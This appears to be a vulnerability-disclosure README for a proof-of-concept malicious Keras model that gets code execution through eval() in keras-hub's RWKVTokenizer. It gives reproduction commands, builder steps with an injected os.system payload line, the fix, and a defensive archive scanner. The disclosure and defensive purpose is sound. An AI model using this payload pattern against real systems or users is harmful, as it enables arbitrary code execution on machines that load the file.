
Keras MFV PoC: RCE via eval() in RWKVTokenizer.set_vocabulary

This repository contains a proof-of-concept malicious .keras model file submitted to Huntr's Model File Vulnerability program.

DO NOT load evil_rwkv.keras on a host you care about. It executes arbitrary code on keras.models.load_model() even with default safe_mode=True. Use a disposable container.

Vulnerability

keras_hub.tokenizers.RWKVTokenizer (in keras-hub ≤ 0.28.0) calls Python's built-in eval() on attacker-controlled vocabulary entries inside its set_vocabulary method, which is invoked from __init__. Because the class does not override from_config, deserialization falls back to the unguarded Operation.from_config default (return cls(**config)), giving an attacker-supplied .keras archive a path to arbitrary code execution at load time.

This is structurally the same root pattern as CVE-2026-1462 (TFSMLayer), in a different class that the upstream patch did not audit.

Severity

Self-assessed CVSS 3.1 = 8.8 (HIGH) — CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H. Matches CVE-2026-1462.

Affected

  • Package: keras-hub
  • Versions: ≤ 0.28.0 (released 2026-04-16)
  • Patch status: merged to master 2026-04-29 (PR #2674, commit a9bb249); not yet released as of 2026-05-05.

Reproduction (in a disposable container)

pip install "keras>=3.14" "tensorflow-cpu" "keras-hub==0.28.0"
huggingface-cli download AnthonyJohn/rwkv.keras evil_rwkv.keras --local-dir .
python -c "import keras; keras.models.load_model('evil_rwkv.keras')"
test -f /tmp/keras_pwned_RWKV && echo 'RCE confirmed' || echo 'no marker'

Expected: keras.models.load_model raises TypeError after the eval has already executed; /tmp/keras_pwned_RWKV exists with content PWNED_via_RWKVTokenizer_eval.

Builder script

The malicious archive in this repo was produced by the script in the linked Huntr submission, summarised:

  1. Build a benign keras.Model containing an RWKVTokenizer with a legitimate vocabulary; save with model.save("benign.keras").
  2. Extract the .keras ZIP, edit config.json so the tokenizer's vocabulary array's first line is "0 __import__('os').system('echo PWNED > /tmp/keras_pwned_RWKV') 1\n" (matching the <idx> <python-literal-repr> <byte-len> format the loader expects).
  3. Repack as a new .keras ZIP. The <repr> field is eval()-ed by the loader, executing the payload.

Suggested fix

Already merged: replace eval() with ast.literal_eval() in both RWKVTokenizer.set_vocabulary and RWKVTokenizerBase.__init__. See keras-team/keras-hub@a9bb249.

Broader recommendation: audit every KerasSaveable subclass on the deserializer's allowlist ({keras, keras_hub, keras_cv, keras_nlp}) for unguarded __init__ side effects. The CVE-2026-1462 patch was a single-class fix; the same root pattern exists in any class whose __init__ has side effects and which lacks a from_config override.
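As an added defensive example (not code from this repository or from keras-hub), the following checker inspects a .keras archive's config.json without ever calling load_model and validates every RWKVTokenizer vocabulary line against the <idx> <python-literal-repr> <byte-len> format using ast.literal_eval, the same replacement the merged fix uses. The config.json nesting used by build_sample, the helper names and the inert sample entries are assumptions constructed for the demonstration.

```python
import ast
import io
import json
import zipfile

def check_vocab_line(line):
    """Return None if the line is a safe literal entry, else a description of the problem."""
    parts = line.rstrip("\n").split(" ")
    if len(parts) < 3:
        return "malformed line (fewer than three fields)"
    # repr may itself contain spaces, so take first and last fields and join the middle
    idx, byte_len, repr_field = parts[0], parts[-1], " ".join(parts[1:-1])
    if not (idx.isdigit() and byte_len.isdigit()):
        return "non-numeric idx or byte-len"
    try:
        value = ast.literal_eval(repr_field)  # only literals; a Call node raises ValueError
    except (ValueError, SyntaxError):
        return f"repr field is not a Python literal: {repr_field!r}"
    if not isinstance(value, (bytes, str)):
        return f"repr field evaluates to {type(value).__name__}, not bytes/str"
    data = value if isinstance(value, bytes) else value.encode("utf-8")
    if len(data) != int(byte_len):
        return f"byte-len {byte_len} does not match literal length {len(data)}"
    return None

def _walk(node, path=""):
    """Yield (path, config) for every serialized object whose class_name mentions RWKVTokenizer."""
    if isinstance(node, dict):
        if "RWKVTokenizer" in str(node.get("class_name", "")) and isinstance(node.get("config"), dict):
            yield path, node["config"]
        for key, val in node.items():
            yield from _walk(val, f"{path}/{key}")
    elif isinstance(node, list):
        for i, val in enumerate(node):
            yield from _walk(val, f"{path}[{i}]")

def scan_keras_archive(data):
    """Inspect a .keras ZIP given as bytes; return a list of findings (empty means clean)."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        cfg = json.loads(zf.read("config.json"))
    for path, tok_cfg in _walk(cfg):
        for n, line in enumerate(tok_cfg.get("vocabulary") or []):
            problem = check_vocab_line(line)
            if problem:
                findings.append(f"{path} vocabulary[{n}]: {problem}")
    return findings

def build_sample(vocab_lines):
    """Constructed archive with an assumed config.json layout, for testing the scanner only."""
    cfg = {"class_name": "Functional", "config": {"layers": [
        {"module": "keras_hub.tokenizers", "class_name": "RWKVTokenizer",
         "config": {"name": "rwkv_tokenizer", "vocabulary": vocab_lines}}]}}
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("config.json", json.dumps(cfg))
    return buf.getvalue()
```

Run scan_keras_archive over a downloaded file's bytes before any load_model call; a non-empty result means the archive should be quarantined rather than opened, even with safe_mode=True.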

References
